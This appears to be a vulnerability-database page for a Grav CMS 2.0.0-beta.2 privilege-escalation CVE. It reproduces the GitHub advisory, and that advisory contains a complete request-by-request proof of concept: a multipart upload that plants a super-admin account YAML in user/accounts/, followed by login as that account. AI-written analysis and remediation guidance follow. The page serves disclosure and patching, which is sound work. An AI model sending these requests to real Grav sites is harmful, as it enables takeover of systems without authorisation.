Grav CMS CVE-2026-42844
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionGitHub Advisory
Summary
In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges.
This results in full administrative compromise of the Grav API.
Details
The vulnerability is located in the API plugin's blueprint upload flow:
user/plugins/api/classes/Api/ApiRouter.php:261user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417user/plugins/api/classes/Api/Controllers/AuthController.php:41-55
The issue exists because /api/v1/blueprint-upload accepts caller-controlled destination and scope values and uses them to resolve the final filesystem write target.
When the request uses:
destination=self@:scope=users/anything
The server resolves the write target to the shared account directory:
user/accounts/The upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext password: field on first login, an attacker can create a fully functional administrator account with api.super.
The required attacker privilege is low:
access:
api:
access: true
media:
write: truePoC
Step 1: Authenticate as the low-privileged API user
POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close
{"username":"uploader","password":"Upload123A"}Extract:
UPLOADER_TOKEN = <access_token from response>Attachment:
<img width="1480" height="825" alt="login-uploader" src="https://github.com/user-attachments/assets/5aeda840-4a37-4365-8e46-caec88066541" />
Step 2: Upload a malicious account YAML file
POST /api/v1/blueprint-upload HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <UPLOADER_TOKEN>
Content-Type: multipart/form-data; boundary=----CodexBoundaryF01
Connection: close
------CodexBoundaryF01
Content-Disposition: form-data; name="destination"
self@:
------CodexBoundaryF01
Content-Disposition: form-data; name="scope"
users/anything
------CodexBoundaryF01
Content-Disposition: form-data; name="file"; filename="pwned.yaml"
Content-Type: text/yaml
email: attacker@example.com
fullname: attacker
title: Site Administrator
state: enabled
password: Passw0rd!123
access:
site:
login: true
api:
super: true
------CodexBoundaryF01--Expected result:
{
"data": [
{
"name": "pwned.yaml",
"path": "user/accounts/pwned.yaml"
}
]
}Attachment:
<img width="1484" height="797" alt="upload" src="https://github.com/user-attachments/assets/0b24c03f-cac5-4b4d-840c-52ac0840969f" />
Step 3: Log in as the newly created account
POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close
{"username":"pwned","password":"Passw0rd!123"}Expected result:
{
"data": {
"user": {
"username": "pwned",
"super_admin": true
}
}
}Attachment:
<img width="1494" height="830" alt="pwned-login" src="https://github.com/user-attachments/assets/7a1ab7fc-d3fb-4077-9b61-09cd947241fe" />
Step 4: Verify privileged API access
GET /api/v1/system/info HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <PWNED_TOKEN>
Connection: closeExpected result:
The request succeeds and returns system-level information.
Attachment:
<img width="1480" height="831" alt="system-info" src="https://github.com/user-attachments/assets/31677d61-3dbd-4ea6-9fbe-80799a628cc2" />
Impact
This is an authenticated vertical privilege-escalation vulnerability.
Any API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once api.super access is obtained, the attacker gains full control over the CMS management API and can:
- modify content
- alter configuration
- manage users
- install or update plugins/themes
- access system-level administration features
In a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.
This issue was reproduced locally:
- the upload response returned
user/accounts/pwned.yaml - logging in as
pwnedsucceeded - the new account had
super_admin = true - privileged endpoints such as
/api/v1/system/infowere accessible
AnalysisAI
Privilege escalation in Grav CMS 2.0.0-beta.2 allows authenticated API users with minimal media.write permissions to fabricate super-admin accounts via arbitrary YAML file upload. The /api/v1/blueprint-upload endpoint accepts attacker-controlled destination and scope parameters that, when combined with specific values (destination=self@: and scope=users/anything), write files directly into user/accounts/. Because Grav parses YAML files in this directory as authoritative user accounts and accepts plaintext passwords on first login, attackers craft a new account with api.super privileges, then authenticate as that account to gain full administrative control. Publicly available exploit code exists (detailed PoC in vendor advisory). Vendor-released patch restricts accounts directory uploads to image-only extensions and blocks config-bearing file types (YAML, JSON, Twig) across all blueprint-upload targets.
Technical ContextAI
Grav is a PHP-based flat-file CMS that stores user accounts as YAML files in user/accounts/, parsed at runtime as authoritative credential and permission data. The vulnerability affects the API plugin's BlueprintUploadController (pkg:composer/getgrav_grav < 2.0.0-beta.4), which routes file uploads through a stream locator pattern. The flaw is a path-traversal variant (CWE-269: Improper Privilege Management) where caller-controlled destination and scope parameters are concatenated without validating the resolved filesystem target against security boundaries. When scope=users/anything is combined with destination=self@:, the locator resolves to user/accounts/ instead of a scoped media directory. The endpoint lacks extension-based ACLs for this directory, so .yaml files are written alongside legitimate avatar images. Grav's account subsystem then reads any YAML file matching username.yaml as a valid account definition, including plaintext password and access.api.super fields. The commit diff shows the fix adds three controls: pre-locator traversal detection (assertSafeDestination rejecting ../segments and null bytes), post-resolution directory classification (classifyTargetDir identifying user/accounts/), and an image-only extension allowlist (ACCOUNTS_IMAGE_EXTENSIONS=[jpg,jpeg,png,gif,webp,svg,avif,bmp,ico]) enforced via guardConfigBearingTarget. Additionally, a global denylist (FORBIDDEN_EXTENSIONS=[yaml,yml,json,twig,env,neon,lock]) blocks config-bearing formats across all blueprint-upload targets to prevent future locator bugs from re-introducing the attack surface in user/config/ or plugin directories.
RemediationAI
Upgrade to Grav CMS 2.0.0-beta.4 or later, which includes the fix from grav-plugin-api commit 97fc02844a35f743dfe93d34efd92d47eedd5bc5 (vendor advisory https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h, patch commit https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5). The patch introduces three hardening layers: input validation rejecting path-traversal segments in destination parameter, directory classification identifying user/accounts/ as a protected target, and an image-only extension allowlist (jpg, jpeg, png, gif, webp, svg, avif, bmp, ico) restricting blueprint-upload writes to this directory. If immediate upgrade is not feasible, implement these compensating controls with noted trade-offs: (1) Disable the API plugin entirely via user/config/plugins/api.yaml (enabled: false) - this breaks all API integrations but eliminates the attack surface completely; (2) Audit and revoke api.media.write permissions from all API user accounts, granting only read-only access (api.media.read: true) - this prevents exploitation but disables legitimate media upload workflows via API; (3) Deploy a reverse proxy or web application firewall to block POST requests to /api/v1/blueprint-upload containing scope=users in the request body - this is fragile (bypassable via parameter encoding or alternate scope values that future locator bugs might resolve to user/accounts/) and requires regex inspection of multipart/form-data payloads. Note that generic filesystem permissions (chmod/chown on user/accounts/) do not mitigate this issue because the PHP process already requires write access to create legitimate user accounts. After patching, verify no unauthorized accounts exist by auditing user/accounts/*.yaml for unfamiliar usernames or accounts with access.api.super: true created during the vulnerability window.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-269 – Improper Privilege Management
View allSame technique Privilege Escalation
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-6xx2-m8wv-756h